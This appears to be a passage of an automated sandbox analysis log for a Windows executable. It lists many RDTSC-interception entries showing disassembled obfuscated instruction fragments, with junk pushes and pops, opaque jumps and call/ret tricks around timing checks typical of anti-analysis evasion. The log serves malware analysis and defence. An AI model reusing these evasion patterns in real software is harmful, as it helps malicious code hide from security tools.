Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEEC9A second address: CEECFA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 add dword ptr [esp], 3AD3BAA4h 0x0000000e add edx, 79098B00h 0x00000014 mov dword ptr [ebp+122D1BA9h], ebx 0x0000001a push 00000003h 0x0000001c movsx edx, dx 0x0000001f push 00000000h 0x00000021 jno 00007F1674F90E1Bh 0x00000027 add cx, 79EEh 0x0000002c mov dx, cx 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F1674F90E18h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push ECE973F1h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEECFA second address: CEED04 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CEED8C second address: CEEE33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F1674F90E1Ch 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e xor dword ptr [ebp+122D1D0Dh], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007F1674F90E18h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push B039E4F8h 0x00000035 pushad 0x00000036 jmp 00007F1674F90E27h 0x0000003b jng 00007F1674F90E29h 0x00000041 jmp 00007F1674F90E23h 0x00000046 popad 0x00000047 add dword ptr [esp], 4FC61B88h 0x0000004e jmp 00007F1674F90E21h 0x00000053 push 00000003h 0x00000055 push 00000000h 0x00000057 mov ch, dh 0x00000059 push 00000003h 0x0000005b mov edx, 2084BF74h 0x00000060 call 00007F1674F90E19h 0x00000065 push eax 0x00000066 push edx 0x00000067 push eax 0x00000068 push edx 0x00000069 pushad 0x0000006a popad 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEE33 second address: CEEE44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEE44 second address: CEEEA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F1674F90E16h 0x00000009 jmp 00007F1674F90E20h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 jmp 00007F1674F90E25h 0x00000018 jmp 00007F1674F90E1Ch 0x0000001d popad 0x0000001e mov eax, dword ptr [esp+04h] 0x00000022 pushad 0x00000023 jmp 00007F1674F90E25h 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEA1 second address: CEEEAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEAF second address: CEEEB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEB3 second address: CEEEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEEB9 second address: CEEF5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push ebx 0x0000000e jng 00007F1674F90E18h 0x00000014 pushad 0x00000015 popad 0x00000016 pop ebx 0x00000017 pop eax 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007F1674F90E18h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000018h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 ja 00007F1674F90E29h 0x00000038 lea ebx, dword ptr [ebp+124509D3h] 0x0000003e push 00000000h 0x00000040 push esi 0x00000041 call 00007F1674F90E18h 0x00000046 pop esi 0x00000047 mov dword ptr [esp+04h], esi 0x0000004b add dword ptr [esp+04h], 00000016h 0x00000053 inc esi 0x00000054 push esi 0x00000055 ret 0x00000056 pop esi 0x00000057 ret 0x00000058 movzx edi, ax 0x0000005b xchg eax, ebx 0x0000005c pushad 0x0000005d push eax 0x0000005e jmp 00007F1674F90E26h 0x00000063 pop eax 0x00000064 pushad 0x00000065 push esi 0x00000066 pop esi 0x00000067 push eax 0x00000068 push edx 0x00000069 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF5D second address: CEEF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF69 second address: CEEF6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEEF6E second address: CEEF74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E285 second address: D0E289 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E289 second address: D0E297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F1675279DA8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E297 second address: D0E2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jc 00007F1674F90E16h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E2A4 second address: D0E2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F1675279DA6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jp 00007F1675279DA6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E2B9 second address: D0E2BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E529 second address: D0E57C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F1675279DB8h 0x0000000a pop ebx 0x0000000b pushad 0x0000000c je 00007F1675279DA6h 0x00000012 pushad 0x00000013 popad 0x00000014 jo 00007F1675279DA6h 0x0000001a push edi 0x0000001b pop edi 0x0000001c popad 0x0000001d pop edx 0x0000001e pop eax 0x0000001f pushad 0x00000020 pushad 0x00000021 je 00007F1675279DA6h 0x00000027 jmp 00007F1675279DB7h 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E57C second address: D0E5A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F1674F90E1Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jg 00007F1674F90E16h 0x00000013 pushad 0x00000014 jmp 00007F1674F90E20h 0x00000019 ja 00007F1674F90E16h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EB57 second address: D0EB6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DB0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EB6B second address: D0EB71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EE95 second address: D0EEA0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EEA0 second address: D0EEB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 jmp 00007F1674F90E1Dh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0EFE3 second address: D0F01D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1675279DACh 0x00000009 jmp 00007F1675279DB8h 0x0000000e jg 00007F1675279DA6h 0x00000014 popad 0x00000015 pushad 0x00000016 jl 00007F1675279DA6h 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F01D second address: D0F023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F023 second address: D0F043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F1675279DB7h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F043 second address: D0F047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F2CA second address: D0F2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F413 second address: D0F41D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1674F90E16h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F41D second address: D0F423 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F423 second address: D0F42D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F42D second address: D0F431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0716C second address: D07172 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07172 second address: D0717D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F1675279DA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0717D second address: D07188 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D07188 second address: D0718E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5AF second address: D0F5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5B6 second address: D0F5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jg 00007F1675279DA6h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1675279DAFh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0F5D2 second address: D0F5D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FBAA second address: D0FBFB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1675279DCCh 0x00000008 jmp 00007F1675279DADh 0x0000000d jmp 00007F1675279DB9h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007F1675279DBFh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FEC3 second address: D0FECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F1674F90E16h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FECE second address: D0FF04 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F1675279DACh 0x00000008 pop ebx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 jmp 00007F1675279DB7h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FF04 second address: D0FF08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FF08 second address: D0FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F1675279DAEh 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1008D second address: D10091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D10091 second address: D100A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007F1675279DACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D100A1 second address: D100A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D12DF1 second address: D12DF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156C5 second address: D156CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D156CF second address: D156D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BEEC second address: D1BEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BEF2 second address: D1BEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1BEFB second address: D1BF2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1674F90E1Eh 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F1674F90E28h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C35F second address: D1C380 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F1675279DA6h 0x0000000d jmp 00007F1675279DB3h 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C380 second address: D1C385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1C385 second address: D1C3A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1675279DA6h 0x0000000a jmp 00007F1675279DAFh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D209 second address: D1D26E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1674F90E1Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xor dword ptr [esp], 1D091A3Dh 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1674F90E18h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov esi, dword ptr [ebp+122D394Eh] 0x00000034 pushad 0x00000035 mov ecx, 1F15945Bh 0x0000003a mov edi, dword ptr [ebp+122D365Ah] 0x00000040 popad 0x00000041 mov esi, dword ptr [ebp+122D37B2h] 0x00000047 push 30C13DCCh 0x0000004c push eax 0x0000004d push edx 0x0000004e jp 00007F1674F90E18h 0x00000054 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D5C7 second address: D1D5D1 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D8C7 second address: D1D8CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1D8CC second address: D1D8D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1675279DACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DDC0 second address: D1DDCA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F1674F90E16h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DE67 second address: D1DE6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DE6D second address: D1DE71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1DE71 second address: D1DE82 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1675279DA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E107 second address: D1E116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jng 00007F1674F90E1Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1E285 second address: D1E28B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F930 second address: D1F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F934 second address: D1F949 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1F949 second address: D1F954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F1674F90E16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209EC second address: D209F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209F2 second address: D209F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209F8 second address: D209FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D209FC second address: D20A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1674F90E20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push esi 0x0000000f call 00007F1674F90E18h 0x00000014 pop esi 0x00000015 mov dword ptr [esp+04h], esi 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc esi 0x00000022 push esi 0x00000023 ret 0x00000024 pop esi 0x00000025 ret 0x00000026 cmc 0x00000027 push 00000000h 0x00000029 mov esi, dword ptr [ebp+122D1920h] 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F1674F90E18h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b or dword ptr [ebp+122D17C0h], edi 0x00000051 xchg eax, ebx 0x00000052 pushad 0x00000053 jmp 00007F1674F90E26h 0x00000058 push eax 0x00000059 push edx 0x0000005a pushad 0x0000005b popad 0x0000005c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D23037 second address: D2305A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1675279DB5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F1675279DA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D22DC1 second address: D22DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2503F second address: D25051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1675279DABh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D25051 second address: D25055 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A466 second address: D2A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B3EF second address: D2B3F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A67F second address: D2A683 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A683 second address: D2A691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1674F90E1Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B5F4 second address: D2B5F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2B5F8 second address: D2B60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F1674F90E18h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E431 second address: D2E435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2E435 second address: D2E449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007F1674F90E16h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2F5C8 second address: D2F5CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D312B0 second address: D312B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
